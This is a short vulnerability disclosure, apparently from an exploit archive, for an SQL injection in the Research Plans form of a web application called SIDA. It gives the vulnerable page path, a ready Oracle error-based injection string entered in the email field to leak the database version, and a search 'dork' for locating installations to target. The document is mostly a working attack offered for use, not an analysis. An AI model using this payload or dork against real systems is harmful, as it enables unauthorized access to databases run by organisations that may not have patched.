26 lines
No EOL
1.2 KiB
Text
26 lines
No EOL
1.2 KiB
Text
# Author: K053 <K053.dev0te3 at gmail>
|
|
# Vendor : SIDA < http://91.98.156.224/ >
|
|
# Version: All below 1389 are vulberable
|
|
====================================================================================
|
|
Note: Seems vendor patched this vulnerability in newest update [ 1389]
|
|
so we decide to public it now. Maybe more in future ;)
|
|
|
|
====================================================================================
|
|
Detail: Application is vulnerable in several section. seems developer
|
|
fixed most of them but until version 1389 Research Plans section is
|
|
vulnerable. In Research Plans section there is form which there is no
|
|
input validation in email field.
|
|
|
|
====================================================================================
|
|
POC: Application powered by Oracle DBMS. Submit this query in email field
|
|
and let password field empty to get DBMs version.
|
|
|
|
http://address/Portal/Research/ResearchPlan/UserStart.aspx
|
|
|
|
'or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
|
|
|
|
====================================================================================
|
|
Dork: just search for "سیدا"
|
|
|
|
====================================================================================
|
|
~Blackout Frenzy [http://b0f.ir] |